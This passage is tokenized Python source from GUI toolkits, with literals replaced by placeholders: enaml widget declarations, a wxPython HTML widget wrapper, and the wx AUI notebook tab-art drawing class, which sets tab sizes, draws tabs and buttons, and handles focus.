"<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } <EOL> IDLE_THEME [ "<STR_LIT>" ] = IDLE_THEME [ "<STR_LIT>" ] </s>
<s> from atom . api import Typed , ForwardTyped , Unicode , Bool , Event , observe <EOL> from enaml . core . declarative import d_ <EOL> from enaml . icon import Icon <EOL> from . toolkit_object import ToolkitObject , ProxyToolkitObject <EOL> class ProxyAction ( ProxyToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : Action ) <EOL> def set_text ( self , text ) : <EOL> raise NotImplementedError <EOL> def set_tool_tip ( self , tool_tip ) : <EOL> raise NotImplementedError <EOL> def set_status_tip ( self , status_tip ) : <EOL> raise NotImplementedError <EOL> def set_icon ( self , icon ) : <EOL> raise NotImplementedError <EOL> def set_checkable ( self , checkable ) : <EOL> raise NotImplementedError <EOL> def set_checked ( self , checked ) : <EOL> raise NotImplementedError <EOL> def set_enabled ( self , enabled ) : <EOL> raise NotImplementedError <EOL> def set_visible ( self , visible ) : <EOL> raise NotImplementedError <EOL> def set_separator ( self , separator ) : <EOL> raise NotImplementedError <EOL> class Action ( ToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> text = d_ ( Unicode ( ) ) <EOL> tool_tip = d_ ( Unicode ( ) ) <EOL> status_tip = d_ ( Unicode ( ) ) <EOL> icon = d_ ( Typed ( Icon ) ) <EOL> checkable = d_ ( Bool ( False ) ) <EOL> checked = d_ ( Bool ( False ) ) <EOL> enabled = d_ ( Bool ( True ) ) <EOL> visible = d_ ( Bool ( True ) ) <EOL> separator = d_ ( Bool ( False ) ) <EOL> triggered = d_ ( Event ( bool ) , writable = False ) <EOL> toggled = d_ ( Event ( bool ) , writable = False ) <EOL> proxy = Typed ( ProxyAction ) <EOL> @ observe ( ( '<STR_LIT:text>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( Action , self ) . _update_proxy ( change ) </s>
<s> from atom . api import Unicode , Typed , ForwardTyped , observe , set_default <EOL> from enaml . core . declarative import d_ <EOL> from . control import Control , ProxyControl <EOL> class ProxyHtml ( ProxyControl ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : Html ) <EOL> def set_source ( self , source ) : <EOL> raise NotImplementedError <EOL> class Html ( Control ) : <EOL> """<STR_LIT>""" <EOL> source = d_ ( Unicode ( ) ) <EOL> hug_width = set_default ( '<STR_LIT:ignore>' ) <EOL> hug_height = set_default ( '<STR_LIT:ignore>' ) <EOL> proxy = Typed ( ProxyHtml ) <EOL> @ observe ( '<STR_LIT:source>' ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( Html , self ) . _update_proxy ( change ) </s>
<s> from atom . api import Typed , ForwardTyped , Enum , Range , observe <EOL> from enaml . core . declarative import d_ <EOL> from . toolkit_object import ToolkitObject , ProxyToolkitObject <EOL> from . widget import Widget <EOL> class ProxyStatusItem ( ProxyToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : StatusItem ) <EOL> def set_mode ( eslf , mode ) : <EOL> raise NotImplementedError <EOL> def set_stretch ( self , stretch ) : <EOL> raise NotImplementedError <EOL> class StatusItem ( ToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> mode = d_ ( Enum ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> stretch = d_ ( Range ( low = <NUM_LIT:0> ) ) <EOL> proxy = Typed ( ProxyStatusItem ) <EOL> def status_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in reversed ( self . children ) : <EOL> if isinstance ( child , Widget ) : <EOL> return child <EOL> @ observe ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( StatusItem , self ) . _update_proxy ( change ) </s>
<s> import wx . html <EOL> from atom . api import Typed <EOL> from enaml . widgets . html import ProxyHtml <EOL> from . wx_control import WxControl <EOL> class wxProperHtmlWindow ( wx . html . HtmlWindow ) : <EOL> """<STR_LIT>""" <EOL> _best_size = wx . Size ( <NUM_LIT> , <NUM_LIT> ) <EOL> def GetBestSize ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _best_size <EOL> class WxHtml ( WxControl , ProxyHtml ) : <EOL> """<STR_LIT>""" <EOL> widget = Typed ( wxProperHtmlWindow ) <EOL> def create_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> self . widget = wxProperHtmlWindow ( self . parent_widget ( ) ) <EOL> def init_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( WxHtml , self ) . init_widget ( ) <EOL> self . set_source ( self . declaration . source ) <EOL> def set_source ( self , source ) : <EOL> """<STR_LIT>""" <EOL> self . widget . SetPage ( source ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __date__ = "<STR_LIT>" <EOL> import wx <EOL> if wx . Platform == '<STR_LIT>' : <EOL> import Carbon . Appearance <EOL> from aui_utilities import BitmapFromBits , StepColour , IndentPressedBitmap , ChopText <EOL> from aui_utilities import GetBaseColour , DrawMACCloseButton , LightColour , TakeScreenShot <EOL> from aui_utilities import CopyAttributes <EOL> from aui_constants import * <EOL> class AuiCommandCapture ( wx . PyEvtHandler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> wx . PyEvtHandler . __init__ ( self ) <EOL> self . _last_id = <NUM_LIT:0> <EOL> def GetCommandId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _last_id <EOL> def ProcessEvent ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . GetEventType ( ) == wx . wxEVT_COMMAND_MENU_SELECTED : <EOL> self . _last_id = event . GetId ( ) <EOL> return True <EOL> if self . GetNextHandler ( ) : <EOL> return self . GetNextHandler ( ) . ProcessEvent ( event ) <EOL> return False <EOL> class AuiDefaultTabArt ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = wx . SystemSettings_GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font = wx . SystemSettings_GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font . SetWeight ( wx . BOLD ) <EOL> self . _measuring_font = self . _selected_font <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> self . _tab_ctrl_height = <NUM_LIT:0> <EOL> self . _buttonRect = wx . Rect ( ) <EOL> self . SetDefaultColours ( ) <EOL> if wx . Platform == "<STR_LIT>" : <EOL> bmp_colour = wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DDKSHADOW ) <EOL> self . _active_close_bmp = DrawMACCloseButton ( bmp_colour ) <EOL> self . _disabled_close_bmp = DrawMACCloseButton ( wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> else : <EOL> self . 
_active_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _hover_close_bmp = self . _active_close_bmp <EOL> self . _pressed_close_bmp = self . _active_close_bmp <EOL> self . _active_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> if wx . Platform == "<STR_LIT>" : <EOL> if hasattr ( wx , '<STR_LIT>' ) : <EOL> c = wx . MacThemeColour ( Carbon . Appearance . kThemeBrushFocusHighlight ) <EOL> else : <EOL> brush = wx . Brush ( wx . BLACK ) <EOL> brush . MacSetTheme ( Carbon . Appearance . kThemeBrushFocusHighlight ) <EOL> c = brush . GetColour ( ) <EOL> self . _focusPen = wx . Pen ( c , <NUM_LIT:2> , wx . SOLID ) <EOL> else : <EOL> self . _focusPen = wx . Pen ( wx . BLACK , <NUM_LIT:1> , wx . USER_DASH ) <EOL> self . _focusPen . SetDashes ( [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> self . _focusPen . SetCap ( wx . CAP_BUTT ) <EOL> def SetBaseColour ( self , base_colour ) : <EOL> """<STR_LIT>""" <EOL> self . _base_colour = base_colour <EOL> self . _base_colour_pen = wx . Pen ( self . _base_colour ) <EOL> self . _base_colour_brush = wx . Brush ( self . 
_base_colour ) <EOL> def SetDefaultColours ( self , base_colour = None ) : <EOL> """<STR_LIT>""" <EOL> if base_colour is None : <EOL> base_colour = GetBaseColour ( ) <EOL> self . SetBaseColour ( base_colour ) <EOL> self . _border_colour = StepColour ( base_colour , <NUM_LIT> ) <EOL> self . _border_pen = wx . Pen ( self . _border_colour ) <EOL> self . _background_top_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> self . _background_bottom_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> self . _tab_top_colour = self . _base_colour <EOL> self . _tab_bottom_colour = wx . WHITE <EOL> self . _tab_gradient_highlight_colour = wx . WHITE <EOL> self . _tab_inactive_top_colour = self . _base_colour <EOL> self . _tab_inactive_bottom_colour = StepColour ( self . _tab_inactive_top_colour , <NUM_LIT> ) <EOL> self . _tab_text_colour = lambda page : page . text_colour <EOL> self . _tab_disabled_text_colour = wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def SetAGWFlags ( self , agwFlags ) : <EOL> """<STR_LIT>""" <EOL> self . _agwFlags = agwFlags <EOL> def GetAGWFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _agwFlags <EOL> def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> tot_width = tab_ctrl_size . x - self . GetIndentSize ( ) - <NUM_LIT:4> <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_CLOSE_BUTTON : <EOL> tot_width -= self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_WINDOWLIST_BUTTON : <EOL> tot_width -= self . 
_active_windowlist_bmp . GetWidth ( ) <EOL> if tab_count > <NUM_LIT:0> : <EOL> self . _fixed_tab_width = tot_width / tab_count <EOL> if self . _fixed_tab_width < <NUM_LIT:100> : <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> if self . _fixed_tab_width > tot_width / <NUM_LIT:2> : <EOL> self . _fixed_tab_width = tot_width / <NUM_LIT:2> <EOL> if self . _fixed_tab_width > <NUM_LIT> : <EOL> self . _fixed_tab_width = <NUM_LIT> <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . _fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . _tab_ctrl_height = tab_ctrl_size . y <EOL> def DrawBackground ( self , dc , wnd , rect ) : <EOL> """<STR_LIT>""" <EOL> self . _buttonRect = wx . Rect ( ) <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> r = wx . Rect ( rect . x , rect . y , rect . width + <NUM_LIT:2> , rect . height ) <EOL> else : <EOL> r = wx . Rect ( rect . x , rect . y , rect . width + <NUM_LIT:2> , rect . height - <NUM_LIT:3> ) <EOL> dc . GradientFillLinear ( r , self . _background_top_colour , self . _background_bottom_colour , wx . SOUTH ) <EOL> dc . SetPen ( self . _border_pen ) <EOL> y = rect . GetHeight ( ) <EOL> w = rect . GetWidth ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . SetBrush ( wx . Brush ( self . _background_bottom_colour ) ) <EOL> dc . DrawRectangle ( - <NUM_LIT:1> , <NUM_LIT:0> , w + <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> else : <EOL> dc . SetBrush ( self . _base_colour_brush ) <EOL> dc . DrawRectangle ( - <NUM_LIT:1> , y - <NUM_LIT:4> , w + <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> caption = page . caption <EOL> if not caption : <EOL> caption = "<STR_LIT>" <EOL> dc . SetFont ( self . _selected_font ) <EOL> selected_textx , selected_texty , dummy = dc . 
GetMultiLineTextExtent ( caption ) <EOL> dc . SetFont ( self . _normal_font ) <EOL> normal_textx , normal_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:3> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> caption = page . caption <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty = selected_textx , selected_texty <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty = normal_textx , normal_texty <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( self . _tab_disabled_text_colour ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( self . _tab_text_colour ( page ) ) <EOL> pagebitmap = page . bitmap <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width : <EOL> clip_width = in_rect . x + in_rect . width - tab_x <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> border_points = [ wx . Point ( ) for i in xrange ( <NUM_LIT:6> ) ] <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y ) <EOL> border_points [ <NUM_LIT:1> ] = wx . Point ( tab_x , tab_y + tab_height - <NUM_LIT:6> ) <EOL> border_points [ <NUM_LIT:2> ] = wx . Point ( tab_x + <NUM_LIT:2> , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:3> ] = wx . Point ( tab_x + tab_width - <NUM_LIT:2> , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:4> ] = wx . Point ( tab_x + tab_width , tab_y + tab_height - <NUM_LIT:6> ) <EOL> border_points [ <NUM_LIT:5> ] = wx . 
Point ( tab_x + tab_width , tab_y ) <EOL> else : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:1> ] = wx . Point ( tab_x , tab_y + <NUM_LIT:2> ) <EOL> border_points [ <NUM_LIT:2> ] = wx . Point ( tab_x + <NUM_LIT:2> , tab_y ) <EOL> border_points [ <NUM_LIT:3> ] = wx . Point ( tab_x + tab_width - <NUM_LIT:2> , tab_y ) <EOL> border_points [ <NUM_LIT:4> ] = wx . Point ( tab_x + tab_width , tab_y + <NUM_LIT:2> ) <EOL> border_points [ <NUM_LIT:5> ] = wx . Point ( tab_x + tab_width , tab_y + tab_height - <NUM_LIT:4> ) <EOL> drawn_tab_yoff = border_points [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = border_points [ <NUM_LIT:0> ] . y - border_points [ <NUM_LIT:1> ] . y <EOL> if page . active : <EOL> r = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . SetPen ( self . _base_colour_pen ) <EOL> dc . SetBrush ( self . _base_colour_brush ) <EOL> dc . DrawRectangle ( r . x + <NUM_LIT:1> , r . y + <NUM_LIT:1> , r . width - <NUM_LIT:1> , r . height - <NUM_LIT:4> ) <EOL> dc . SetPen ( wx . Pen ( self . _tab_gradient_highlight_colour ) ) <EOL> dc . SetBrush ( wx . Brush ( self . _tab_gradient_highlight_colour ) ) <EOL> dc . DrawRectangle ( r . x + <NUM_LIT:2> , r . y + <NUM_LIT:1> , r . width - <NUM_LIT:3> , r . height - <NUM_LIT:4> ) <EOL> dc . SetPen ( self . _base_colour_pen ) <EOL> dc . DrawPoint ( r . x + <NUM_LIT:2> , r . y + <NUM_LIT:1> ) <EOL> dc . DrawPoint ( r . x + r . width - <NUM_LIT:2> , r . y + <NUM_LIT:1> ) <EOL> r . SetHeight ( r . GetHeight ( ) / <NUM_LIT:2> ) <EOL> r . x += <NUM_LIT:2> <EOL> r . width -= <NUM_LIT:2> <EOL> r . y += r . height <EOL> r . y -= <NUM_LIT:2> <EOL> top_colour = self . _tab_bottom_colour <EOL> bottom_colour = self . _tab_top_colour <EOL> dc . GradientFillLinear ( r , bottom_colour , top_colour , wx . NORTH ) <EOL> else : <EOL> r = wx . Rect ( tab_x , tab_y + <NUM_LIT:1> , tab_width , tab_height - <NUM_LIT:3> ) <EOL> r . x += <NUM_LIT:3> <EOL> r . 
y += <NUM_LIT:1> <EOL> r . width -= <NUM_LIT:4> <EOL> r . height /= <NUM_LIT:2> <EOL> r . height -= <NUM_LIT:1> <EOL> top_colour = self . _tab_inactive_top_colour <EOL> bottom_colour = self . _tab_inactive_bottom_colour <EOL> dc . GradientFillLinear ( r , bottom_colour , top_colour , wx . NORTH ) <EOL> r . y += r . height <EOL> r . y -= <NUM_LIT:1> <EOL> top_colour = self . _tab_inactive_bottom_colour <EOL> bottom_colour = self . _tab_inactive_bottom_colour <EOL> dc . GradientFillLinear ( r , top_colour , bottom_colour , wx . SOUTH ) <EOL> dc . SetPen ( self . _border_pen ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> dc . DrawPolygon ( border_points ) <EOL> if page . active : <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . SetPen ( wx . Pen ( self . _background_bottom_colour ) ) <EOL> else : <EOL> dc . SetPen ( self . _base_colour_pen ) <EOL> dc . DrawLine ( border_points [ <NUM_LIT:0> ] . x + <NUM_LIT:1> , <EOL> border_points [ <NUM_LIT:0> ] . y , <EOL> border_points [ <NUM_LIT:5> ] . x , <EOL> border_points [ <NUM_LIT:5> ] . y ) <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width - <NUM_LIT:5> <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:8> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width - <NUM_LIT:5> <EOL> dc . DrawBitmap ( pagebitmap , <EOL> bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . 
GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + ( drawn_tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) - <NUM_LIT:1> <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff , drawn_tab_height , rectx , recty ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> shift = ( agwFlags & AUI_NB_BOTTOM and [ <NUM_LIT:1> ] or [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + <NUM_LIT:4> , tab_y + ( tab_height - bmp . GetHeight ( ) ) / <NUM_LIT:2> - shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . 
Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:1> , <EOL> tab_y + ( tab_height - bmp . GetHeight ( ) ) / <NUM_LIT:2> - shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def SetCustomButton ( self , bitmap_id , button_state , bmp ) : <EOL> """<STR_LIT>""" <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state == AUI_BUTTON_STATE_NORMAL : <EOL> self . _active_close_bmp = bmp <EOL> self . _hover_close_bmp = self . _active_close_bmp <EOL> self . _pressed_close_bmp = self . _active_close_bmp <EOL> self . _disabled_close_bmp = self . _active_close_bmp <EOL> elif button_state == AUI_BUTTON_STATE_HOVER : <EOL> self . _hover_close_bmp = bmp <EOL> elif button_state == AUI_BUTTON_STATE_PRESSED : <EOL> self . _pressed_close_bmp = bmp <EOL> else : <EOL> self . _disabled_close_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_left_bmp = bmp <EOL> else : <EOL> self . _active_left_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_right_bmp = bmp <EOL> else : <EOL> self . _active_right_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_windowlist_bmp = bmp <EOL> else : <EOL> self . _active_windowlist_bmp = bmp <EOL> def GetIndentSize ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:5> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> dc . SetFont ( self . _measuring_font ) <EOL> measured_textx , measured_texty , dummy = dc . 
GetMultiLineTextExtent ( caption ) <EOL> tab_width = measured_textx <EOL> tab_height = measured_texty <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> tab_width += self . _active_close_bmp . GetWidth ( ) + <NUM_LIT:3> <EOL> if bitmap . IsOk ( ) : <EOL> tab_width += bitmap . GetWidth ( ) <EOL> tab_width += <NUM_LIT:3> <EOL> tab_height = max ( tab_height , bitmap . GetHeight ( ) ) <EOL> tab_width += <NUM_LIT:16> <EOL> tab_height += <NUM_LIT:10> <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_TAB_FIXED_WIDTH : <EOL> tab_width = self . _fixed_tab_width <EOL> if control is not None : <EOL> tab_width += control . GetSize ( ) . GetWidth ( ) + <NUM_LIT:4> <EOL> x_extent = tab_width <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawButton ( self , dc , wnd , in_rect , button , orientation ) : <EOL> """<STR_LIT>""" <EOL> bitmap_id , button_state = button . id , button . cur_state <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_close_bmp <EOL> elif button_state & AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif button_state & AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> else : <EOL> bmp = self . _active_close_bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_left_bmp <EOL> else : <EOL> bmp = self . _active_left_bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_right_bmp <EOL> else : <EOL> bmp = self . _active_right_bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_windowlist_bmp <EOL> else : <EOL> bmp = self . _active_windowlist_bmp <EOL> else : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = button . dis_bitmap <EOL> else : <EOL> bmp = button . 
bitmap <EOL> if not bmp . IsOk ( ) : <EOL> return <EOL> rect = wx . Rect ( * in_rect ) <EOL> if orientation == wx . LEFT : <EOL> rect . SetX ( in_rect . x ) <EOL> rect . SetY ( ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) ) <EOL> rect . SetWidth ( bmp . GetWidth ( ) ) <EOL> rect . SetHeight ( bmp . GetHeight ( ) ) <EOL> else : <EOL> rect = wx . Rect ( in_rect . x + in_rect . width - bmp . GetWidth ( ) , <EOL> ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> bmp . GetWidth ( ) , bmp . GetHeight ( ) ) <EOL> rect = IndentPressedBitmap ( rect , button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_rect = rect <EOL> if bitmap_id == AUI_BUTTON_RIGHT : <EOL> self . _buttonRect = wx . Rect ( rect . x , rect . y , <NUM_LIT:30> , rect . height ) <EOL> return out_rect <EOL> def DrawFocusRectangle ( self , dc , page , wnd , draw_text , text_offset , bitmap_offset , drawn_tab_yoff , drawn_tab_height , textx , texty ) : <EOL> """<STR_LIT>""" <EOL> if self . GetAGWFlags ( ) & AUI_NB_NO_TAB_FOCUS : <EOL> return <EOL> if page . active and wx . Window . FindFocus ( ) == wnd : <EOL> focusRectText = wx . Rect ( text_offset , ( drawn_tab_yoff + ( drawn_tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) ) , <EOL> textx , texty ) <EOL> if page . bitmap . IsOk ( ) : <EOL> focusRectBitmap = wx . Rect ( bitmap_offset , drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( page . bitmap . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> page . bitmap . GetWidth ( ) , page . bitmap . GetHeight ( ) ) <EOL> if page . bitmap . IsOk ( ) and draw_text == "<STR_LIT>" : <EOL> focusRect = wx . Rect ( * focusRectBitmap ) <EOL> elif not page . bitmap . IsOk ( ) and draw_text != "<STR_LIT>" : <EOL> focusRect = wx . Rect ( * focusRectText ) <EOL> elif page . bitmap . IsOk ( ) and draw_text != "<STR_LIT>" : <EOL> focusRect = 